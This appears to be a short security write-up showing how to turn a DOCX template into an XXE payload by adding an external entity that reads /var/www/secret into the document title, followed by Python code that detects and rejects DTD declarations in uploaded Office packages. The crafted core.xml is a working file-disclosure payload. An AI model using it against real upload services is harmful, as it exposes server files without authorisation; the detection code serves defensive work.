Download the template docx file, change its extension to zip, and inside the zip archive edit docProps/core.xml so that its contents are:
```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root[
<!ENTITY xxe SYSTEM "/var/www/secret">
]>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:title>&xxe;</dc:title>
<dc:subject></dc:subject>
<dc:creator></dc:creator>
<cp:keywords></cp:keywords>
<dc:description></dc:description>
<cp:lastModifiedBy></cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2015-08-01T19:00:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-01T19:01:00Z</dcterms:modified>
</cp:coreProperties>
```
Change the extension back to docx and upload the file to trigger the XXE vulnerability.
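On the receiving side, an upload handler can reject such a package before any XML parser touches it, because a well-formed OOXML part has no reason to carry a DTD. The following is an added example, not code from the original post; the function names and the size limit are assumptions, and the sample packages are constructed in memory.

```python
import io
import re
import zipfile

# Any DTD construct is a reject reason: OOXML parts have no use for one.
DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
XML_SUFFIXES = (".xml", ".rels")


def decode_part(raw: bytes) -> str:
    """Decode by BOM so a UTF-16 part cannot slip past the pattern match."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")


def find_dtd_parts(package: bytes, max_part_size: int = 10 * 1024 * 1024) -> list:
    """Return names of XML parts in the package that should be refused."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(XML_SUFFIXES):
                continue
            if info.file_size > max_part_size:
                flagged.append(info.filename)  # oversized: refuse, do not inflate
                continue
            if DTD_RE.search(decode_part(zf.read(info))):
                flagged.append(info.filename)
    return flagged


def build_sample(core_xml) -> bytes:
    """Build a minimal constructed package around the given core.xml content."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("docProps/core.xml", core_xml)
    return buf.getvalue()


# Constructed sample inputs: one clean part, one with the DTD shown above.
CLEAN = '<?xml version="1.0"?><cp:coreProperties/>'
TAMPERED = ('<?xml version="1.0"?><!DOCTYPE root[<!ENTITY xxe SYSTEM '
            '"/var/www/secret">]><cp:coreProperties/>')

if __name__ == "__main__":
    print("clean:", find_dtd_parts(build_sample(CLEAN)))
    print("tampered:", find_dtd_parts(build_sample(TAMPERED)))
```

This check complements, and does not replace, configuring the XML parser itself to disallow DTDs and external entity resolution.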
